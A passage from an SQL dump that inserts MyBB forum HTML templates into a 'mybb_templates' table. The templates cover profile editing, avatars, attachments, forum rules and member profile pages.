class=\"smalltext\">{$lang->new_custom_usertitle}</span></td> </tr> <tr> <td><input type=\"text\" class=\"textbox\" name=\"usertitle\" size=\"25\" maxlength=\"{$mybb->settings[\'customtitlemaxlength\']}\" value=\"{$newtitle}\" /></td> </tr> <tr> <td><span class=\"smalltext\"><input type=\"checkbox\" name=\"reverttitle\" id=\"reverttitle\" class=\"checkbox\" /> {$lang->revert_usertitle}</span></td> </tr> </table> </fieldset> <br />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('88', 'usercp_attachments_none', '<tr> <td class=\"trow1\" align=\"center\" colspan=\"5\">{$lang->no_attachments}</td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('89', 'usercp_nav_changename', '<div><a href=\"usercp.php?action=changename\" class=\"usercp_nav_item usercp_nav_username\">{$lang->ucp_nav_change_username}</a></div>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('90', 'usercp_profile', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->edit_profile}</title> {$headerinclude} </head> <body> {$header} <form action=\"usercp.php\" method=\"post\" name=\"input\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> {$errors} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->edit_profile}</strong></td> </tr> <tr> <td width=\"50%\" class=\"trow1\" valign=\"top\"> <fieldset class=\"trow2\"> <legend><strong>{$lang->profile_required}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\"> <tr> <td colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->change_email_notice}</strong></span></td> </tr> {$requiredfields} </table> </fieldset> <br /> <fieldset class=\"trow2\"> <legend><strong>{$lang->profile_optional}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\"> <tr> <td colspan=\"3\"><span class=\"smalltext\">{$lang->birthday}</span></td> </tr> <tr> <td> <select name=\"bday1\"> <option value=\"\">&nbsp;</option> {$bdaydaysel} </select> </td> <td> <select name=\"bday2\"> <option value=\"\">&nbsp;</option> <option value=\"1\" {$bdaymonthsel[\'1\']}>{$lang->month_1}</option> <option value=\"2\" {$bdaymonthsel[\'2\']}>{$lang->month_2}</option> <option value=\"3\" {$bdaymonthsel[\'3\']}>{$lang->month_3}</option> <option value=\"4\" {$bdaymonthsel[\'4\']}>{$lang->month_4}</option> <option value=\"5\" {$bdaymonthsel[\'5\']}>{$lang->month_5}</option> <option value=\"6\" {$bdaymonthsel[\'6\']}>{$lang->month_6}</option> <option value=\"7\" {$bdaymonthsel[\'7\']}>{$lang->month_7}</option> <option value=\"8\" {$bdaymonthsel[\'8\']}>{$lang->month_8}</option> <option value=\"9\" {$bdaymonthsel[\'9\']}>{$lang->month_9}</option> <option value=\"10\" {$bdaymonthsel[\'10\']}>{$lang->month_10}</option> <option value=\"11\" {$bdaymonthsel[\'11\']}>{$lang->month_11}</option> <option value=\"12\" {$bdaymonthsel[\'12\']}>{$lang->month_12}</option> </select> </td> <td> <input type=\"text\" class=\"textbox\" size=\"4\" maxlength=\"4\" name=\"bday3\" value=\"{$bday[\'2\']}\" /> </td> </tr> <tr> <td colspan=\"3\"> <span class=\"smalltext\">{$lang->birthdayprivacy}</span> </td> </tr> <tr> <td colspan=\"3\"> <select name=\"birthdayprivacy\"> {$bdayprivacysel} </select> </td> </tr> <tr> <td colspan=\"3\"><span class=\"smalltext\">{$lang->website_url}</span></td> </tr> <tr> <td colspan=\"3\"><input type=\"text\" class=\"textbox\" name=\"website\" size=\"25\" maxlength=\"75\" value=\"{$user[\'website\']}\" /></td> </tr> </table> </fieldset> {$customfields} </td> <td width=\"50%\" class=\"trow1\" valign=\"top\"> {$customtitle} <fieldset class=\"trow2\"> <legend><strong>{$lang->additional_contact_details}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\"> <tr> <td><span class=\"smalltext\">{$lang->icq_number}</span></td> </tr> <tr> <td><input type=\"text\" class=\"textbox\" name=\"icq\" size=\"25\" value=\"{$user[\'icq\']}\" /></td> </tr> <tr> <td><span class=\"smalltext\">{$lang->aim_screenname}</span></td> </tr> <tr> <td><input type=\"text\" class=\"textbox\" name=\"aim\" size=\"25\" value=\"{$user[\'aim\']}\" /></td> </tr> <tr> <td><span class=\"smalltext\">{$lang->msn}</span></td> </tr> <tr> <td><input type=\"text\" class=\"textbox\" name=\"msn\" size=\"25\" value=\"{$user[\'msn\']}\" /></td> </tr> <tr> <td><span class=\"smalltext\">{$lang->yahoo_id}</span></td> </tr> <tr> <td><input type=\"text\" class=\"textbox\" name=\"yahoo\" size=\"25\" value=\"{$user[\'yahoo\']}\" /></td> </tr> </table> </fieldset> {$awaysection} </td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"do_profile\" /> <input type=\"submit\" class=\"button\" name=\"regsubmit\" value=\"{$lang->update_profile}\" /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('91', 'post_attachments', '<br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"3\"><strong>{$lang->attachments}</strong></td> </tr> <tr> <td class=\"tcat smalltext\" colspan=\"3\">{$lang->attach_quota} <a href=\"usercp.php?action=attachments\">{$lang->view_attachments}</a></td> </tr> {$newattach} {$attachments} </table>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('92', 'usercp_attachments', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->attachments_manager}</title> {$headerinclude} </head> <body> {$header} <form action=\"usercp.php\" method=\"post\" name=\"attachmentsmanager\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"5\"><strong>{$lang->attachments_manager} {$usagenote}</strong></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\" width=\"40%\"><span class=\"smalltext\"><strong>{$lang->attachments_attachment}</strong></span></td> <td class=\"tcat\" width=\"40%\"><span class=\"smalltext\"><strong>{$lang->attachments_post}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"20%\"><span class=\"smalltext\"><strong>{$lang->date_uploaded}</strong></span></td> <td class=\"tcat\" width=\"1\"><input type=\"checkbox\" class=\"checkbox checkall\" /></td> </tr> {$attachments} </table> {$multipage} <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"do_attachments\" /> <input type=\"submit\" class=\"button\" value=\"{$lang->delete_attachments}\" /> </div> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->attachments_stats}</strong></td> </tr> <tr> <td class=\"trow1\" width=\"40%\"><strong>{$lang->attachstats_attachs}</strong></td> <td class=\"trow1\" width=\"60%\">{$totalattachments}</td> </tr> <tr> <td class=\"trow2\" width=\"40%\"><strong>{$lang->attachstats_spaceused}</strong></td> <td class=\"trow2\" width=\"60%\">{$friendlyusage} ({$percent})</td> </tr> <tr> <td class=\"trow1\" width=\"40%\"><strong>{$lang->attachstats_quota}</strong></td> <td class=\"trow1\" width=\"60%\">{$attachquota}</td> </tr> <tr> <td class=\"trow2\" width=\"40%\"><strong>{$lang->attachstats_totaldl}</strong></td> <td class=\"trow2\" width=\"60%\">{$totaldownloads}</td> </tr> <tr> <td class=\"trow1\" width=\"40%\"><strong>{$lang->attachstats_bandwidth}</strong></td> <td class=\"trow1\" width=\"60%\">{$bandwidth}</td> </tr> </table> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('93', 'usercp_attachments_attachment', '<tr> <td class=\"{$altbg}\" width=\"1\">{$icon}</td> <td class=\"{$altbg}\" width=\"40%\"><a href=\"attachment.php?aid={$attachment[\'aid\']}\" target=\"_blank\">{$attachment[\'filename\']}</a><br /><span class=\"smalltext\">{$sizedownloads}</span></td> <td class=\"{$altbg}\"><a href=\"{$attachment[\'postlink\']}#pid{$attachment[\'pid\']}\">{$attachment[\'subject\']}</a><br /><span class=\"smalltext\">{$lang->attachment_thread} <a href=\"{$attachment[\'threadlink\']}\">{$attachment[\'threadsubject\']}</a></span></td> <td class=\"{$altbg}\" align=\"center\">{$attachdate}, {$attachtime}</td> <td class=\"{$altbg}\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"attachments[{$attachment[\'aid\']}]\" value=\"{$attachment[\'aid\']}\" /></td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('94', 'misc_rules_forum', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$forum[\'rulestitle\']}</title> {$headerinclude} </head> <body> {$header} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"{$colspan}\"><strong>{$forum[\'rulestitle\']}</strong></td> </tr> <tr> <td class=\"trow1\">{$forum[\'rules\']}</td> </tr> </table> {$footer} </body> </html>', '-2', '1210', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('95', 'forumdisplay_rules', '<br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$foruminfo[\'rulestitle\']}</strong></td> </tr> <tr> <td class=\"trow1\"><span class=\"smalltext\">{$foruminfo[\'rules\']}</span></td> </tr> </table> <br />', '-2', '1607', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('96', 'forumdisplay_rules_link', '<br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\"><strong><a href=\"misc.php?action=rules&amp;fid={$fid}\">{$foruminfo[\'rulestitle\']}</a></strong></td> </tr> </table> <br />', '-2', '1607', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('97', 'forumdisplay', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$foruminfo[\'name\']} </title> {$headerinclude} {$rssdiscovery} <script type=\"text/javascript\"> <!-- lang.no_new_posts = \"{$lang->no_new_posts}\"; lang.click_mark_read = \"{$lang->click_mark_read}\"; // --> </script> </head> <body> {$header} {$moderatedby} {$usersbrowsing} {$rules} {$subforums} {$threadslist} {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('98', 'member_register_referrer', '<br /> <fieldset class=\"trow2\"> <legend><strong>{$lang->referrer}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\"> <tr> <td><span class=\"smalltext\"><label for=\"referrer\">{$lang->referrer_desc}</label></span></td> </tr> <tr> <td> <input type=\"text\" class=\"textbox\" name=\"referrername\" id=\"referrer\" value=\"{$referrername}\" style=\"width: 100%;\" /> </td> </tr></table> </fieldset> <script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script> <script type=\"text/javascript\"> <!-- if(use_xmlhttprequest == \"1\") { new autoComplete(\"referrer\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\"}); } // --> </script>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('99', 'usercp_usergroups_joingroup', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->request_join_usergroup}</title> {$headerinclude} </head> <body> {$header} <form action=\"usercp.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->request_join_usergroup}</strong></td> </tr> <tr> <td class=\"trow1\" align=\"center\" colspan=\"2\">{$lang->join_group_moderate_note}</td> </tr> <tr> <td class=\"trow2\"><strong>{$lang->user_group}</strong></td> <td class=\"trow2\">{$usergroup[\'title\']}</td> </tr> <tr> <td class=\"trow1\"><strong>{$lang->join_reason}</strong></td> <td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"reason\" value=\"\" size=\"50\" /></td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"usergroups\" /> <input type=\"hidden\" name=\"joingroup\" value=\"{$joingroup}\" /> <input type=\"hidden\" name=\"do\" value=\"joingroup\" /> <input type=\"submit\" class=\"button\" value=\"{$lang->send_join_request}\" /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('100', 'usercp_options_pms_from_buddys', '<tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"receivefrombuddy\" id=\"receivefrombuddy\" value=\"1\" {$receivefrombuddycheck} /></td> <td><span class=\"smalltext\"><label for=\"receivefrombuddy\">{$lang->receive_from_buddy}</label></span></td> </tr>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('101', 'usercp_avatar', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->change_avatar}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> {$avatar_error} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->change_avatar}</strong></td> </tr> <tr> <td class=\"trow1\" colspan=\"2\"> <table cellspacing=\"0\" cellpadding=\"0\" width=\"100%\"><tr> <td>{$lang->avatar_note}{$avatarmsg} </td> {$currentavatar} </tr></table> </td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><strong>{$lang->local_galleries}</strong></td> </tr> <tr> <td class=\"trow2\"><strong>{$lang->gallery}</strong></td> <td class=\"trow2\"> <form method=\"post\" action=\"usercp.php\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"avatar\" /> <select name=\"gallery\"> {$galleries} </select> &nbsp;{$gobutton} </form> </td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><strong>{$lang->custom_avatar}</strong></td> </tr> <tr> <td class=\"trow1\" width=\"40%\"><strong>{$lang->avatar_upload}</strong></td> <td class=\"trow1\" width=\"60%\"> <form enctype=\"multipart/form-data\" action=\"usercp.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"file\" name=\"avatarupload\" size=\"25\" class=\"fileupload\" /> {$auto_resize} </td> </tr> <tr> <td class=\"trow2\" width=\"40%\"><strong>{$lang->avatar_url}</strong></td> <td class=\"trow2\" width=\"60%\"><input type=\"text\" class=\"textbox\" name=\"avatarurl\" size=\"45\" value=\"{$avatarurl}\" /></td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"do_avatar\" /> <input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->change_avatar}\" /> <input type=\"submit\" class=\"button\" name=\"remove\" value=\"{$lang->remove_avatar}\" /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('102', 'usercp_avatar_gallery', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->change_avatar}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> {$avatar_error} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->change_avatar}</strong></td> </tr> <tr> <td class=\"tcat\"><strong>{$lang->local_galleries}</strong></td> </tr> <tr> <td class=\"trow1\" align=\"center\"> <form method=\"post\" action=\"usercp.php\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"avatar\" /> <select name=\"gallery\"> {$galleries} </select> &nbsp;{$gobutton} </form> </td> </tr> <tr> <td class=\"tcat\"><strong>{$lang->avatars_in_gallery}</strong></td> </tr> <tr> <td class=\"trow2\"> <form method=\"post\" action=\"usercp.php\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"do_avatar\" /> <input type=\"hidden\" name=\"gallery\" value=\"{$gallery}\" /> <table width=\"100%\" cellpadding=\"4\"> {$avatarlist} </table> </td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"do_avatar\" /> <input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->change_avatar}\" /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('103', 'usercp_avatar_gallery_avatar', '<td width=\"20%\" align=\"center\"><label for=\"avatar-{$avatar}\"><img src=\"{$avatarpath}\" alt=\"{$avatar}\" title=\"{$avatar}\" /><br /><input type=\"radio\" class=\"radio\" name=\"avatar\" value=\"{$avatar}\" id=\"avatar-{$avatar}\" /><strong>{$avatarname}</strong></td>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('104', 'usercp_avatar_current', '<td class=\"trow1\" width=\"150\" align=\"right\"><img src=\"{$urltoavatar}\" alt=\"{$lang->avatar_mine}\" title=\"{$lang->avatar_mine}\" {$avatar_width_height} /></td>', '-2', '1603', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('105', 'headerinclude', '<link rel=\"alternate\" type=\"application/rss+xml\" title=\"{$lang->latest_threads} (RSS 2.0)\" href=\"{$mybb->settings[\'bburl\']}/syndication.php\" /> <link rel=\"alternate\" type=\"application/atom+xml\" title=\"{$lang->latest_threads} (Atom 1.0)\" href=\"{$mybb->settings[\'bburl\']}/syndication.php?type=atom1.0\" /> <meta http-equiv=\"Content-Type\" content=\"text/html; charset={$charset}\" /> <meta http-equiv=\"Content-Script-Type\" content=\"text/javascript\" /> <script type=\"text/javascript\" src=\"{$mybb->settings[\'bburl\']}/jscripts/prototype.js?ver=1603\"></script> <script type=\"text/javascript\" src=\"{$mybb->settings[\'bburl\']}/jscripts/general.js?ver=1603\"></script> <script type=\"text/javascript\" src=\"{$mybb->settings[\'bburl\']}/jscripts/popup_menu.js?ver=1600\"></script> {$stylesheets} <script type=\"text/javascript\"> <!-- var cookieDomain = \"{$mybb->settings[\'cookiedomain\']}\"; var cookiePath = \"{$mybb->settings[\'cookiepath\']}\"; var cookiePrefix = \"{$mybb->settings[\'cookieprefix\']}\"; var deleteevent_confirm = \"{$lang->deleteevent_confirm}\"; var removeattach_confirm = \"{$lang->removeattach_confirm}\"; var loading_text = \'{$lang->ajax_loading}\'; var saving_changes = \'{$lang->saving_changes}\'; var use_xmlhttprequest = \"{$mybb->settings[\'use_xmlhttprequest\']}\"; var my_post_key = \"{$mybb->post_code}\"; var imagepath = \"{$theme[\'imgdir\']}\"; // --> </script> {$newpmmsg}', '-2', '1603', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('106', 'showthread_similarthreads', '<br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" align=\"center\" colspan=\"6\"><strong>{$lang->similar_threads}</strong></td> </tr> <tr> <td class=\"tcat\" align=\"center\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->thread}</strong></span></td> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->author}</strong></span></td> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->replies}</strong></span></td> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->views}</strong></span></td> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->lastpost}</strong></span></td> </tr> {$similarthreadbits} </table>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('107', 'nav_sep', ' / ', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('108', 'post_attachments_new', '<tr> <td class=\"trow1\" width=\"1\"><img src=\"{$theme[\'imgdir\']}/paperclip.gif\" alt=\"\" /></td> <td class=\"trow1\" style=\"white-space: nowrap\"><strong>{$lang->new_attachment}</strong> <input type=\"file\" name=\"attachment\" size=\"30\" class=\"fileupload\" /></td><td class=\"trow1\" align=\"center\">{$attach_update_options} <input type=\"submit\" class=\"button\" name=\"newattachment\" value=\"{$lang->add_attachment}\" tabindex=\"13\" /> </td> </tr>', '-2', '1604', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('109', 'nav_sep_active', ' / ', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('110', 'member_profile_online', '<a href=\"online.php\"><span class=\"online\" style=\"font-weight: bold;\">{$lang->postbit_status_online}</span></a> ({$location} @ {$location_time})', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('111', 'member_profile_offline', '<span class=\"offline\" style=\"font-weight: bold;\">{$lang->postbit_status_offline}</span>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('112', 'member_profile', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->profile}</title> {$headerinclude} </head> <body> {$header} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\"> <table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tr><td class=\"trow1\" width=\"75%\"> <span class=\"largetext\"><strong>{$formattedname}</strong></span><br /> <span class=\"smalltext\"> ({$usertitle})<br /> {$groupimage} {$userstars}<br /> <br /> <strong>{$lang->registration_date}</strong> {$memregdate}<br /> <strong>{$lang->date_of_birth}</strong> {$membday} {$membdayage}<br /> <strong>{$lang->local_time}</strong> {$localtime}<br /> <strong>{$lang->postbit_status}</strong> {$online_status} </span> </td><td width=\"25%\" align=\"right\" valign=\"middle\">{$avatar}</td></tr></table> </td> </tr> {$awaybit} </table> <br /> <table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"> <tr> <td width=\"50%\" valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td colspan=\"2\" class=\"thead\"><strong>{$lang->users_forum_info}</strong></td> </tr> <tr> <td class=\"trow1\"><strong>{$lang->joined}</strong></td> <td class=\"trow1\">{$memregdate}</td> </tr> <tr> <td class=\"trow2\"><strong>{$lang->lastvisit}</strong></td> <td class=\"trow2\">{$memlastvisitdate} {$memlastvisittime}</td> </tr> <tr> <td class=\"trow1\"><strong>{$lang->total_posts}</strong></td> <td class=\"trow1\">{$memprofile[\'postnum\']} ({$lang->ppd_percent_total})<br /><span class=\"smalltext\">(<a href=\"search.php?action=finduserthreads&amp;uid={$uid}\">{$lang->find_threads}</a> &mdash; <a href=\"search.php?action=finduser&amp;uid={$uid}\">{$lang->find_posts}</a>)</span></td> </tr> <tr> <td class=\"trow2\"><strong>{$lang->timeonline}</strong></td> <td class=\"trow2\">{$timeonline}</td> </tr> {$referrals} {$reputation} {$warning_level} </table> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td colspan=\"2\" class=\"thead\"><strong>{$lang->users_contact_details}</strong></td> </tr> <tr> <td class=\"trow1\" width=\"40%\"><strong>{$lang->homepage}</strong></td> <td class=\"trow1\">{$website}</td> </tr> {$sendemail} <tr> <td class=\"{$bgcolors[\'pm\']}\"><strong>{$lang->pm}</strong></td> <td class=\"{$bgcolors[\'pm\']}\"><a href=\"private.php?action=send&amp;uid={$memprofile[\'uid\']}\">{$lang->send_pm}</a></td> </tr> <tr> <td class=\"{$bgcolors[\'icq\']}\"><strong>{$lang->icq_number}</strong></td> <td class=\"{$bgcolors[\'icq\']}\">{$memprofile[\'icq\']}</td> </tr> <tr> <td class=\"{$bgcolors[\'aim\']}\"><strong>{$lang->aim_screenname}</strong></td> <td class=\"{$bgcolors[\'aim\']}\"><a href=\"javascript:;\" onclick=\"MyBB.popupWindow(\'misc.php?action=imcenter&amp;imtype=aim&amp;uid={$uid}\', \'imcenter\', 450, 300);\">{$memprofile[\'aim\']}</a></td> </tr> <tr> <td class=\"{$bgcolors[\'yahoo\']}\"><strong>{$lang->yahoo_id}</strong></td> <td class=\"{$bgcolors[\'yahoo\']}\"><a href=\"javascript:;\" onclick=\"MyBB.popupWindow(\'misc.php?action=imcenter&amp;imtype=yahoo&amp;uid={$uid}\', \'imcenter\', 450, 300);\">{$memprofile[\'yahoo\']}</a></td> </tr> <tr> <td class=\"{$bgcolors[\'msn\']}\"><strong>{$lang->msn}</strong></td> <td class=\"{$bgcolors[\'msn\']}\"><a href=\"javascript:;\" onclick=\"MyBB.popupWindow(\'misc.php?action=imcenter&amp;imtype=msn&amp;uid={$uid}\', \'imcenter\', 450, 300);\">{$memprofile[\'msn\']}</a></td> </tr> </table> </td> <td><img src=\"{$theme[\'imgdir\']}/pixel.gif\" height=\"1\" width=\"8\" alt=\"\"/></td> <td width=\"50%\" valign=\"top\"> {$profilefields} {$signature} {$modoptions} {$adminoptions} {$buddy_options} </td> </tr> </table> {$footer} </body> </html>', '-2', '1602', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('113', 'member_profile_adminoptions', ' <br /><table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\" class=\"tborder\"> <tr> <td colspan=\"2\" class=\"thead\"><strong>{$lang->admin_options}</strong></td> </tr> <tr> <td class=\"trow1\"> <ul> <li><a href=\"{$mybb->settings[\'bburl\']}/{$config[\'admin_dir\']}/index.php?module=user-users&amp;action=edit&amp;uid={$uid}\">{$lang->admin_edit_in_acp}</a></li> <li><a href=\"{$mybb->settings[\'bburl\']}/{$config[\'admin_dir\']}/index.php?module=user-banning&amp;uid={$uid}\">{$lang->admin_ban_in_acp}</a></li> </ul> </td> </tr> </table>', '-2', '1605', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('114', 'member_profile_modoptions', ' <br /><table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\" class=\"tborder\"> <tr> <td colspan=\"2\" class=\"thead\"><strong>{$lang->mod_options}</strong></td> </tr> <tr> <td class=\"trow1\"> <ul> <li><a href=\"{$mybb->settings[\'bburl\']}/modcp.php?action=editprofile&amp;uid={$uid}\">{$lang->edit_in_mcp}</a></li> <li><a href=\"{$mybb->settings[\'bburl\']}/modcp.php?action=banuser&amp;uid={$uid}\">{$lang->ban_in_mcp}</a></li> </ul> </td> </tr> <tr> <td class=\"trow2\"> {$memprofile[\'usernotes\']}<br /> <a 